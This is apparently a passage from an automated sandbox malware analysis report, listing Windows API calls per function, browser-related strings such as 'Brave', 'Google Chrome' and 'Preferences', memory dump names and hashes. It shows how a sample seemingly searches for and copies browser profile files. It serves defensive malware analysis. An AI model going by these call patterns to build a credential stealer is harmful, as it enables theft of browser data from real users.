                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41A81
                                • lstrlen.KERNEL32(00E71794), ref: 00E41A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41AAC
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E41B45
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E41B70
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E41B8A
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41C03
                                • lstrlen.KERNEL32(00E71794), ref: 00E41C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C31
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41C74
                                • lstrlen.KERNEL32(00E71794), ref: 00E41C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41CA2
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41CAE
                                • lstrlen.KERNEL32(?), ref: 00E41CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00E41CE9
                                • lstrlen.KERNEL32(00E71794), ref: 00E41CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41D14
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41DEB
                                • lstrlen.KERNEL32(00E71794), ref: 00E41DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41E19
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41E56
                                • lstrlen.KERNEL32(00E71794), ref: 00E41E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41E81
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41E8D
                                • lstrlen.KERNEL32(?), ref: 00E41E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 00E41EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E41F45
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41F9F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E41FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00E41FE3
                                • lstrlen.KERNEL32(00E71794), ref: 00E41FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4200E
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E42042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4204D
                                • lstrlen.KERNEL32(00E71794), ref: 00E42058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42075
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E42081
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: 53ffb024dfbdc4c4e49ebf967e300ce77f95d70af9c2ef655a0e822995c036d3
                                • Instruction ID: fbd6e353b55d9058018fc48991dd282a10670866ede3915ddaa567ac66215c07
                                • Opcode Fuzzy Hash: 53ffb024dfbdc4c4e49ebf967e300ce77f95d70af9c2ef655a0e822995c036d3
                                • Instruction Fuzzy Hash: 36929F3191121A9BCF21EF64FC88AAE77F9AF44318F446068FA45B7205DB35ED45CBA0
                                Function 00E4DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DBEF
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E4DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DC17
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E4DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DC4C
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DC8F
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E4DCD0
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E4DCF0
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E4DD0A
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E4DD1D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DD7B
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DDA3
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DDAF
                                • lstrlen.KERNEL32(?), ref: 00E4DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DE19
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4DE6F
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DE7B
                                • lstrlen.KERNEL32(016C8B48), ref: 00E4DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DEBB
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4DEE6
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DEF2
                                • lstrlen.KERNEL32(016C89A8), ref: 00E4DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DFA5
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DFB1
                                • lstrlen.KERNEL32(016C8B48), ref: 00E4DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DFF4
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E022
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4E02E
                                • lstrlen.KERNEL32(016C89A8), ref: 00E4E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00E4E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00E4E0E7
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E11F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E4E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E155
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E19F
                                • lstrcat.KERNEL32(00000000), ref: 00E4E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E4E1F9
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E22F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E4E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E261
                                • lstrcat.KERNEL32(00000000,016C88F8), ref: 00E4E269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 00E4E274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00E4E2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E349
                                • DeleteFileA.KERNEL32(?), ref: 00E4E381
                                • StrCmpCA.SHLWAPI(?,016CD850), ref: 00E4E3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E445
                                • StrCmpCA.SHLWAPI(?,016C89A8), ref: 00E4E468
                                • StrCmpCA.SHLWAPI(?,016C8B48), ref: 00E4E47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E4E4E0
                                • StrCmpCA.SHLWAPI(?,016CD790), ref: 00E4E58E
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E4E639
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E678
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E737
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00E4E776
                                • DeleteFileA.KERNEL32(?), ref: 00E4E7D2
                                • StrCmpCA.SHLWAPI(?,016C88C8), ref: 00E4E7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E916
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E952
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: d61463a5894e464660d3acb0e0c2f7c4a196751ae60bd1c76542df3fb90bbaf0
                                • Instruction ID: 3c1f8c86fa5809fd3448ccaf1a2f79edbf553d1c7b2648bb0f2b19a86033df2a
                                • Opcode Fuzzy Hash: d61463a5894e464660d3acb0e0c2f7c4a196751ae60bd1c76542df3fb90bbaf0
                                • Instruction Fuzzy Hash: D0928E71A102059BCB21EF78EC89AAE77F9BF44318F44A528F945B7345DB34EC458BA0
                                Function 00E518A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E518D2
                                • lstrlen.KERNEL32(\*.*), ref: 00E518DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E518FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00E5190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E51947
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E51967
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E51981
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E519BF
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E519F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A4C
                                • lstrlen.KERNEL32(00E71794), ref: 00E51A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A80
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51AB4
                                • lstrlen.KERNEL32(?), ref: 00E51AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 00E51AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51B19
                                • lstrlen.KERNEL32(016C8908), ref: 00E51B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51B8F
                                • lstrlen.KERNEL32(00E71794), ref: 00E51BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51BC3
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51C57
                                • lstrlen.KERNEL32(00E71794), ref: 00E51C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51C8B
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D21
                                • lstrlen.KERNEL32(00E71794), ref: 00E51D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D55
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51DED
                                • lstrlen.KERNEL32(00E71794), ref: 00E51E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51E36
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51E68
                                • lstrlen.KERNEL32(016CD748), ref: 00E51E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51EB2
                                • lstrlen.KERNEL32(00E71794), ref: 00E51EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51EE3
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51F15
                                • lstrlen.KERNEL32(016CE090), ref: 00E51F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51F5F
                                • lstrlen.KERNEL32(00E71794), ref: 00E51F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51F90
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51FC2
                                • lstrlen.KERNEL32(016BA938), ref: 00E51FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52036
                                • lstrlen.KERNEL32(00E71794), ref: 00E52048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52067
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E52073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52098
                                • lstrlen.KERNEL32(?), ref: 00E520AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E520D0
                                • lstrcat.KERNEL32(00000000,?), ref: 00E520DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52103
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5213F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E5214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E52181
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 933cdfa583765d3047ed37ffeb92ce0e497eb14e4d1af8b7fa802d47bb1ffb35
                                • Instruction ID: 2c554c18a1f00e439fd59f2f2ade1d77e7a2379a5d272cef56082150e8d7a56a
                                • Opcode Fuzzy Hash: 933cdfa583765d3047ed37ffeb92ce0e497eb14e4d1af8b7fa802d47bb1ffb35
                                • Instruction Fuzzy Hash: 6A62C130911616ABCB22AF64EC48AAF77F9AF44709F44642CFE45B3245DB35DD09CBA0
                                Function 00E53910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00E5392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E53943
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5396C
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E53986
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E539BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E539E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E539F2
                                • lstrlen.KERNEL32(00E71794), ref: 00E539FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53A1A
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53A26
                                • lstrlen.KERNEL32(?), ref: 00E53A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53A53
                                • lstrcat.KERNEL32(00000000,?), ref: 00E53A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53A8A
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E53ACE
                                • lstrlen.KERNEL32(?), ref: 00E53AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53B36
                                • lstrlen.KERNEL32(00E71794), ref: 00E53B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53B6A
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53B9E
                                • lstrlen.KERNEL32(?), ref: 00E53BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 00E53BE0
                                • lstrlen.KERNEL32(016C88F8), ref: 00E53C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53C3C
                                • lstrlen.KERNEL32(016C8908), ref: 00E53C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53CB7
                                • lstrlen.KERNEL32(00E71794), ref: 00E53CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53CE8
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E53D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53D79
                                • lstrlen.KERNEL32(00E71794), ref: 00E53D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53DAD
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53E43
                                • lstrlen.KERNEL32(00E71794), ref: 00E53E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53E77
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53F0D
                                • lstrlen.KERNEL32(00E71794), ref: 00E53F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53F41
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53F75
                                • lstrlen.KERNEL32(?), ref: 00E53F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 00E53FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53FE0
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5401F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E5402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E540CE
                                • lstrcat.KERNEL32(00000000), ref: 00E540DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E542D9
                                • FindClose.KERNEL32(00000000), ref: 00E542E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
